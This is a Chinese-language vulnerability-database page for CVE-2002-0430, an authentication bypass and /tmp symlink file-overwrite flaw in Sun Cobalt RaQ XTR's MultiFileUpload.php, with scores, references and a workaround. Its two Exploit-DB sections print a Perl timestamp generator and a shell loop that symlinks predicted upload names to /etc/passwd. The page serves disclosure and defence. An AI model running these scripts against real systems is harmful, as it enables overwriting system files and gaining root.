CVE-2002-0430
CVSS3.7
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-10 15:12:01
NMCOES    

[原文]MultiFileUploadHandler.php in the Sun Cobalt RaQ XTR administration interface allows local users to bypass authentication and overwrite arbitrary files via a symlink attack on a temporary file, followed by a request to MultiFileUpload.php.


[CNNVD]Cobalt RaQ XTR MultiFileUpload.php绕过认证漏洞(CNNVD-200208-182)

        
        Cobalt RaQ是一个基于internet的服务器程序,由Sun微系统公司发布和维护。
        Cobalt RaQ的"MultiFileUpload.php"文件访问设置上存在问题,远程攻击者可以利用此漏洞上传任意文件到服务器,本地用户可能利用此漏洞得到主机的root权限。
        Cobalt RaQ的其他管理脚本受HTTP认证口令的保护,但"MultiFileUpload.php"脚本却没有,远程攻击者无需任何认证就可以使用此脚本以任意用户的身份上传文件。更糟的是上传的文件是以可预见的文件名存放在/tmp目录下面的,如果攻击者有本地用户访问权限,他可以在/tmp目录下建立符号链接指向想要重写的文件,然后利用"MultiFileUpload.php"脚本上传文件,这样就可以达到重写系统文件的目地,从而得到主机的root权限。远程攻击者至少可以利用此漏洞消耗主机的磁盘空间,造成拒绝服务攻击。
        攻击者可以通过类似下列链接访问该PHP程序:
        https://:81/uifc/MultFileUploadHandler.php
        

- CVSS (基础分值)

CVSS分值: 3.7 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:sun:cobalt_raq_4Sun Cobalt RaQ 4.0
cpe:/h:sun:cobalt_raq_3iSun Cobalt RaQ 3.0
cpe:/h:sun:cobalt_raq_2Sun Cobalt RaQ 2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0430
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0430
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-182
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4252
(UNKNOWN)  BID  4252
http://archives.neohapsis.com/archives/bugtraq/2002-03/0081.html
(VENDOR_ADVISORY)  BUGTRAQ  20020308 Remote Cobalt Raq XTR vulns

- 漏洞信息

Cobalt RaQ XTR MultiFileUpload.php绕过认证漏洞
低危 输入验证
2002-08-12 00:00:00 2006-08-28 00:00:00
远程  
        
        Cobalt RaQ是一个基于internet的服务器程序,由Sun微系统公司发布和维护。
        Cobalt RaQ的"MultiFileUpload.php"文件访问设置上存在问题,远程攻击者可以利用此漏洞上传任意文件到服务器,本地用户可能利用此漏洞得到主机的root权限。
        Cobalt RaQ的其他管理脚本受HTTP认证口令的保护,但"MultiFileUpload.php"脚本却没有,远程攻击者无需任何认证就可以使用此脚本以任意用户的身份上传文件。更糟的是上传的文件是以可预见的文件名存放在/tmp目录下面的,如果攻击者有本地用户访问权限,他可以在/tmp目录下建立符号链接指向想要重写的文件,然后利用"MultiFileUpload.php"脚本上传文件,这样就可以达到重写系统文件的目地,从而得到主机的root权限。远程攻击者至少可以利用此漏洞消耗主机的磁盘空间,造成拒绝服务攻击。
        攻击者可以通过类似下列链接访问该PHP程序:
        https://:81/uifc/MultFileUploadHandler.php
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果不需要使用MultiFileUpload.php脚本,去掉其可执行属性或删除之。如果需要,设置正确的HTTP访问认证。
        厂商补丁:
        Sun
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.sun.com

- 漏洞信息 (21334)

Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (1) (EDBID:21334)
php remote
2002-03-08 Verified
0 Wouter ter Maat
N/A [点击下载]
source: http://www.securityfocus.com/bid/4252/info

Cobalt RaQ is a server appliance for Internet-based services. It is distributed and maintained by Sun Microsystems.

The 'MultiFileUpload.php' script is not sufficiently protected from outside access. While other sensitive administrative scripts are protected with HTTP authentication, 'MultiFileUpload.php' is not. Remote clients may invoke the execution of this script without valid administrator credentials.

In doing so, it is possible for an attacker to upload files that are created on the server filesystem as any user.

Furthermore, the uploaded files are stored in '/tmp' with predictable filenames. If the attacker has local access to the system, this vulnerability can be exploited to overwrite a file of equal user and group ownership through the use of a symbolic link.

Successful exploitation of this vulnerability by an attacker with local access may result in a compromise of root privileges. Attackers without local access may be able to cause a denial of service through consumption of disk space.

#!/usr/bin/perl
# mass base64 time encoder
# part of Cobalt UIFC XTR remote/local combination attack


use MIME::Base64;
$evil_time = time();

$exploit_secs = 10; # time in seconds you got to exploit this bug (race)

for($i=1;$i<=$exploit_secs; $i++) {
      $evil_time = $evil_time+1;
      $evilstr = encode_base64($evil_time);
      print $evilstr;
}
		

- 漏洞信息 (21335)

Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (2) (EDBID:21335)
php remote
2002-03-08 Verified
0 Wouter ter Maat
N/A [点击下载]
source: http://www.securityfocus.com/bid/4252/info
 
Cobalt RaQ is a server appliance for Internet-based services. It is distributed and maintained by Sun Microsystems.
 
The 'MultiFileUpload.php' script is not sufficiently protected from outside access. While other sensitive administrative scripts are protected with HTTP authentication, 'MultiFileUpload.php' is not. Remote clients may invoke the execution of this script without valid administrator credentials.
 
In doing so, it is possible for an attacker to upload files that are created on the server filesystem as any user.
 
Furthermore, the uploaded files are stored in '/tmp' with predictable filenames. If the attacker has local access to the system, this vulnerability can be exploited to overwrite a file of equal user and group ownership through the use of a symbolic link.
 
Successful exploitation of this vulnerability by an attacker with local access may result in a compromise of root privileges. Attackers without local access may be able to cause a denial of service through consumption of disk space.

#!/bin/sh
#Script for creating symlinks from output of local-timerace-xtr

for foo in `perl -x xtr-timerace-xtr.pl`
do
ln -s /etc/passwd $foo
done		

- 漏洞信息

13161
Sun Cobalt RaQ XTR MultiFileUploadHandler.php Arbitrary File Overwrite
Remote / Network Access

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-03-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cobalt RaQ XTR MultiFileUpload.php Authentication Bypass Vulnerability
Input Validation Error 4252
Yes No
2002-03-08 12:00:00 2009-07-11 10:56:00
Vulnerability discovered credit to Wouter ter Maat <grazer@digit-labs.org>.

- 受影响的程序版本

Cobalt RaQ 4.0
Cobalt RaQ 3.0
Cobalt RaQ 2.0

- 漏洞讨论

Cobalt RaQ is a server appliance for Internet-based services. It is distributed and maintained by Sun Microsystems.

The 'MultiFileUpload.php' script is not sufficiently protected from outside access. While other sensitive administrative scripts are protected with HTTP authentication, 'MultiFileUpload.php' is not. Remote clients may invoke the execution of this script without valid administrator credentials.

In doing so, it is possible for an attacker to upload files that are created on the server filesystem as any user.

Furthermore, the uploaded files are stored in '/tmp' with predictable filenames. If the attacker has local access to the system, this vulnerability can be exploited to overwrite a file of equal user and group ownership through the use of a symbolic link.

Successful exploitation of this vulnerability by an attacker with local access may result in a compromise of root privileges. Attackers without local access may be able to cause a denial of service through consumption of disk space.

- 漏洞利用

Exploits contributed by W. ter Maat - Digit-Labs Information Security &lt;termaat@gelrevision.nl&gt;.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站